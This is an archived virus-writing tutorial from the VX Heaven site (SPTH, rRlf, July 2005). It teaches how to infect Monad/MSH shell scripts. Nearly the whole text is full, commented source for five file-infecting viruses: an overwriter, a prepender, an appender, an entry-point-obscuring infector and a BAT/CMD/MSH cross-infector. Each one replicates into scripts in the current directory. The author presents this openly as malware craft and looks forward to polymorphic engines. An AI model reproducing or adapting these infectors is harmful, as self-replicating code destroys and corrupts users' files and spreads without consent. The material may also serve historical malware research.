Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Monad: Microsoft Command Shell Infection Tutorial

SPTH
Ready Rangers Liberation Front [6]
July 2005

[Back to index] [Comments]

Index

  1. Intro Words
  2. File Infection
    1. Overwriting
    2. Prepending
    3. Appending
    4. Entry Point Obscuring
    5. Cross Infection: BAT / CMD / MSH
  3. Last Words

0) Intro Words

Monad - Microsoft Command Shell is the next version of CMD.exe and will be used in Microsoft Windows Longhorn. Everybody knows that command.com and CMD.exe had a very small amount of commands, and where therefore nearly useless. Monad will be like Linux's Bash - that means a great number of command and functions. We will be able to make as huge and complex script as we can do it in Linux. As I thought this next step of Microsoft (stealing the ideas of OpenSource Software) should be infected too, I did. It is totally different to the older Command Shell of M$: The objects seems to have a very near connection to C#, the syntax is near to the syntax of bash or PHP. Nevertheless I sat down and tried it, and after ~6 hours after installing I saw my first Overwriter working. I think it is quite funny to infect a future part of Longhorn, which will be released in ~12 months. :D Just for information: I've worked with Windows Command Shell [6.0.4093.0]. Now, let's more to the real content!

1) File Infection

1.1) Overwriting

Usually, this topic is not interesting at all, but I think you should see a the sample too, for getting a first idea about that language. The virus overwrites all *.msh files in the current directory:

MSH Overwriter

$name_array=get-childitem *.msh
foreach ($name in $name_array)
{
  if ($name.Length -eq 249)
  {
    $my_file=$name.Name
  }
}

foreach ($victim in $name_array)
{
  if ($name.Length -ne 249)
  {
    copy-item $my_file $name.Name
  }
}
 

The virus works like that:

1.2) Prepending

This Prepender is now the first real MSH virus. For the following small code I've worked several hours, as there are strange logical problems between normal variables and arrays. But finally I did it, and now you can see the the result. The short description can be found after the code.

MSH Prepender

$name_array=get-childitem *.msh
# Candela
foreach ($name in $name_array)
{
  $cont=get-content $name.Name
  if ($cont[1] -eq "# Candela")
  {
    $my_name=$name.Name
  }
}

$vir_cont=get-content $my_name

foreach ($name in $name_array)
{
  $cont=get-content $name.Name
  if ($cont[1] -ne "# Candela")
  {
    echo $vir_cont[0] >$name.Name
    for ($i=1; $i -lt 23; $i++) { echo $vir_cont[$i] >>$name.Name }
    echo $cont >>$name.Name
  }
}
 

It works like that:

1.3) Appending

The next important file infection type if the appending file infector. The code is just slight different to the prepending file infection type, so there should be no problem to understand it, if you have already understood the other codes. For this code I did not need very long (~20 mins), so you can see, that this language is not very difficult, if you know, how to work with it. OK, here the code:

MSH Appender

$name_array=get-childitem *.msh
# Candela
foreach ($name in $name_array)
{
  $cont=get-content $name.Name
  for ($i=0; $i -lt $cont.Length; $i++)
  {
    if ($cont[$i] -eq "# Candela")
    {
      $my_name=$name.Name
    }
  }
}

$vir_cont=get-content $my_name
foreach ($name in $name_array)
{
  $inf=0
  $cont=get-content $name.Name
  for ($i=0; $i -lt $cont.Length; $i++)
  {
    if ($cont[$i] -eq "# Candela")
    {
      $inf=1
    }
  }
  if ($inf -eq 0)
  {
    echo $cont >$name.Name
    $vir_start=$vir_cont.Length-36
    for ($i=$vir_start; $i -lt $vir_cont.Length; $i++)
    {
      echo $vir_cont[$i] >>$name.Name
    }
  }
}
 

How does it work:

1.4) Entry Point Obscuring

The last three infection types are very easy to detect and to desinfect. Now comes the first techniqual trick: EPO. The virus infects the file anywhere in the middle. This makes it harder to find, as the whole files have to be checked, not just the beginning and the end of the file. A very hard problem for this beta is, that there is no command for random numbers. There is a command called get-random, but it is just a demo and does not exist in the MSH.exe, but in a DemoCommands.dll. I did not want to use this DemoCommands.dll, as the virus will not work at next betas or at the final version. See the information from cmdletSummary.htm:

get-random (Demo)       Returns a random integer within        get-random [[-max] maximum] 
                        the integer range specified.           [[-min] minimum]

I solved that problem in another way: I added the length of all files in files in the current directory, and used the arithmetic operator % for getting a valueable pseudo random number. Everything else should be clear. A shourt summary of the virus after the code.

MSH EPO

$name_array=get-childitem *.msh
# Candela
foreach ($name in $name_array)
{
  $cont=get-content $name.Name
  for ($i=0; $i -lt $cont.Length; $i++)
  {
    if ($cont[$i] -eq "# Candela")
    {
      $my_name=$name.Name
      $my_position=$i-1
    }
  }
}

$all=get-childitem *.*
$rnd_num=0
for ($i=0; $i -lt $all.Length; $i++)
{
  $rnd_num+=$all[$i].Length
}

$vir_cont=get-content $my_name
foreach ($name in $name_array)
{
  $inf=0
  $cont=get-content $name.Name
  for ($i=0; $i -lt $cont.Length; $i++)
  {
    if ($cont[$i] -eq "# Candela")
    {
      $inf=1
    }
  }
  if ($inf -eq 0)
  {
    $position=$rnd_num%$cont.Length
    echo $cont[0] >$name.Name
    for ($i=1; $i -lt $position; $i++)
    {
      echo $cont[$i] >>$name.Name
    }

    for ($i=$my_position; $i -lt $my_position+54; $i++)
    {
      echo $vir_cont[$i] >>$name.Name
    }

    for ($i=$position; $i -lt $cont.Length; $i++)
    {
      echo $cont[$i] >>$name.Name
    }
  }
}
 

Summary of the code above:

1.5) Cross Infection: BAT / CMD / MSH

Last code is a cross infector for every Windows Command Line. That means BAT-Files (Win95-98), CMD-Files (WinNT/Win00-WinXP) and MSH-Files (Windows Longhorn [and maybe Blackcomp???]). I've done it without intern code changing while runtime, but all in one code. That means the code for BAT files looks like that one from CMDs and that one from MSH. As you will see now, there were very big problems, as MSH has no more-line command (like /* */), it fails when an error occure (No On Error Resume Next), it checks the content of functions, even they are not executed ect. Anyway, somehow I did it, and you can see it now - but without summary at the end, as there is nothing more to explain, you just see the (already known) code and the Cross-Infection technique.

BAT/CMD/MSH Cross Infector

#Candela
$Candela=('
@echo off %Candela%
rem ','Candela
%Candela%cls
rem ','Candela
find "Candela" <%0 > Candela.bat %Candela%
rem ','Candela
for %%v in (*.bat *.msh *.cmd) do copy Candela.bat+%%v %%v
rem ','Candela
del Candela.bat
rem ','Candela
goto Candela
rem ','Candela
set Candela=1')
$name_array=get-childitem *.msh    #Candela
$name_array+=get-childitem *.bat   #Candela
$name_array+=get-childitem *.cmd   #Candela
foreach ($name in $name_array) {   #Candela
  $cont=get-content $name.Name     #Candela
  if ($cont[0] -eq "#Candela"){
    $my_name=$name.Name            #Candela
  } #Candela
} #Candela
$vir_cont=get-content $my_name     #Candela
foreach ($name in $name_array) {   #Candela
  $cont=get-content $name.Name     #Candela
  if ($cont[0] -ne "#Candela") {
    echo $vir_cont[0] >$name.Name  #Candela
    for ($i=1; $i -lt 34; $i++) { echo $vir_cont[$i] >>$name.Name } #Candela
    echo $cont >>$name.Name        #Candela
  } #Candela
} #Candela
:Candela
 

2) Last Words

I'm too happy that I've finally managed to write this article. Reason: Microsoft Windows Longhorn (or Windows 2006 - as it will be called too) will be released in ~12 months. One sad thing: As there is currently no random-number generator included, it was not possible to write polymorphic engines for it, but someday they will include it, and then it's again time to rock ;) With this article I also wanted to show/tell you, that we are at the beginning of a real good new age. I hope some of you are ready for new discoverment too! :D

                                                  - - - - - - - - - - - - - - -
                                                    Second Part To Hell/[rRlf]  
                                                    www.spth.de.vu
                                                    [email protected]
                                                    written in July 2005

                                                    ...surrealistic viruswriter...
                                                  - - - - - - - - - - - - - - -
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua